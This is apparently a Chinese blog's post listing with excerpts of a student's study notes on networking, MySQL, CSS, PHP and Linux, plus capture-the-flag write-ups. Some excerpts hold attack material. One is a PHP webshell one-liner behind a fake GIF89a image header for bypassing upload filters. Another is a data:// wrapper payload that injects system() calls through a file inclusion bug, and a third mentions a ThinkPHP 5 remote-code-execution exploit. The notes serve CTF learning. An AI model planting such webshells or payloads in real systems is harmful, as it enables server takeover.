- 博客(15)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 计网初学笔记
零、计算机网络(1)因特网的组成因特网=边缘部分+核心部分=资源子网+通信子网因特网的边缘部分:主机间的通信方式:客户服务器方式、对等方式因特网的核心部分:数据交换方式:1.电路交换(适合数据量大的实时传输)2.报文交换3.分组交换(2)计算机网络的性能1.速率链接在计算机网络上的主机在数字信道上传输数据位数的速率,也称data rate或bit rate。单位b/s,kb/s,Mb/s,Gb/s。2.带宽数据通信领域中,数字信道所能传输的最高数据率。单位b/s,kb/s,
2021-11-23 21:37:11
2510
1
原创 Mysql
目录数据库操作:链接数据库操作表操作:字段操作:记录操作:增:一次插入一条一次插入多条根据索引值进行判断,若存在,先删除在插入删:删除一条或多条初始化表改:查:单表查询查询表中某些字段以表中某些字段为条件查询按照id号查询排序多表查询子查询关联查询左/右链接查询联合查询数据库操作:链接数据库cd 进入bin目录 输入 mysql -u root -p 然后输入密码操作show databases; 显示数据库use 库名; 选择数据库DROP DATABASE 库名; 删除库creat
2021-09-25 15:51:50
198
原创 GIF89a
GIF89a<script language="php">eval($_GET[shell])</script>当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
2021-09-15 20:36:20
1969
原创 JavaScript笔记
目录类型转换字符串转换为数字Number()parseInt()parseFloat()数字转换为字符串与空字符相加toString()类型转换字符串转换为数字Number()将“数字型字符串变”为数字(123和3.14,也包括正负号)parseInt()在Number基础上遇见小数点和非数字停止(可以包括正负号)parseFloat()在Number基础上遇见非数字停止(可以包括小数点和正负号)数字转换为字符串与空字符相加数字+“字符”=“数字字符”
2021-08-10 21:41:00
176
原创 PHP正则表达式
目录正则表达式是什么正则表达式语法普通字符字符转义元字符限定符定位符分组正则表达式是什么正则表达式的设计思想就是使用一些描述性的符号和文字,为字符串定义一个规则。凡是符合这个规则的,程序就认为文本是匹配的,否则就是不匹配。正则表达式的匹配过程,通俗地讲,就是逐字匹配表达式的描述规则,如果每个字符都匹配,那么程序就认为匹配成功,只要有一个匹配不成功,那么匹配就失败。正则表达式语法普通字符想判断某个长度为1的字符串是不是数字可以使用[0123456789],如果符合规则的字符范围是连续的还可以省
2021-08-09 16:17:24
329
原创 css盒子模型
目录css盒子内容区宽高:width、height行内元素,块元素,行内块元素:内边界外边距边框css盒子所有元素都可以看成一个盒子从上面可以看出,盒子的组成成分有4个:1.content 内容,可以是文本或图片2.padding 内边距,用于定义内容与边框之间的距离3.margin 外边距,用于定义当前元素与其他元素之间的距离4.border 边框,用于定义元素边框内容区内容区是css盒子模型的中心,它有三个属性:width、height、overflow,width和hei
2021-08-01 16:59:43
108
原创 攻防世界Web_php_include
查看题目给了一堆php代码:include(): 类似include($_GET[‘value’]; )的问题1.可以用php://input伪协议:get和post的区别2.可以用data://伪协议来操作:接下来用data://伪协议将一句话木马写入(base64编码)用中国蚁剑链接——其实不用base64编码也可以:输入http://111.200.241.244:53101/?page=data://text/plain,<?php syste
2021-07-30 20:52:14
154
原创 攻防世界php_rce
开始题目只说了rce百度一下rec:可能是让我们利用漏洞去找旗帜看一下页面:php5确实有漏洞查百度:随便复制一个提示为5.0.20的:继续找5.0的漏洞找见一个发现能用:接下来就是疯狂ls加catls …/…/…里有flag,但不是flag.txtflag{thinkphp5_rce}...
2021-07-30 14:31:28
131
原创 css笔记(内部样式表) 2
目录1.列表样式2.表格样式3.图片样式4.背景样式5.链接样式6.鼠标样式1.列表样式list-style-type 定义列表项符号有序列表:ol {list-style-type:lower-roman/upper-alpha;}小写数字,大写字母无序列表:ul {list-style-type:disc/circle/square;}实心圆,空心圆,正方形去掉符号:ol {list-style-type:none;}list-style-image 列表项图片lis
2021-07-29 18:51:33
90
原创 攻防世界web(基础后六)笔记
目录php的弱比较POST和GETxff和refererwebshellping加密php的弱比较php中有两种比较符号=== 会同时比较字符串的值和类型== 会先将字符串换成相同类型,再作比较,属于弱类型比较题目说$a==0 and $a 值为true时输出 $flag1,且 $b不是数字且大于1234时输出 $flag2。利用若比较在hackbar里用GET将abc赋值给a,12345ad的值给bPOST和GET两种 HTTP 请求方法:GET 和 POST在客户机和服务器之间进
2021-07-29 00:46:38
337
原创 css笔记(内部样式表) 1
目录1.css选择器2.字体样式3.文本样式4.边框样式1.css选择器元素选择器div /p /span {…;}id选择器#加id {…;}class选择器.加class {…;}后代选择器#加id p /span /div {…;}.加class p /span /div {…;}群组选择器h3,div,p,span {…;} 同时对多个选择器操作2.字体样式font-family 字体类型p {font-family:Arial,
2021-07-27 19:39:44
116
原创 用html搭建的比较完善的框架
<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>我的网页</title> <style type="text/css"> table,tr,td,th{border:1px solid seagreen} </style> </head> <body> <div> <
2021-07-27 14:38:08
192
原创 php笔记
一.将字符串“张三#李四#王五,刘六”变为字符串或数组1.用split()函数<?php $arr='张三#李四#王五,刘六'; $a=preg_split("/[#,]/",$arr); print_r($a);?>2.用replace()函数<?php $arr='张三#李四#王五,刘六'; $a=preg_replace("/[#,]/",'',$arr); print_r($a);?>3.用explode()函数<?php $ar
2021-07-27 14:31:55
101
原创 Linux(ubuntu) 基础操作
Linux(ubuntu)操作pwdclear目录查看的操作文件颜色代表的含义对目录的操作查找特定文件创建pwdpwd命令,以绝对路径的方式显示用户当前工作目录命令将当前目录的全路径名称(从根目录)写入标准输出。 clearclear命令用于清屏目录查看的操作ls 查看目录ls空格-a 查看所有的子目录及文件(包括隐藏的)ls空格-l 详细信息 包括创建信息权限(列表形势)ls空格-l空格-a 详细信息 包括创建信息权限(列表形势包括隐藏的)等同ls空格-la
2021-07-27 14:21:30
364
原创 攻防世界web(基础前六)笔记
攻防世界web怎么查看查看源代码robot协议是什么backup备份文件cookie是什么disabled-buttonweak-auth怎么查看查看源代码1.鼠标右键(ctrl+u)2.点击F123.在浏览器工具里找到开发者工具robot协议是什么robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够
2021-07-26 14:30:54
236
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人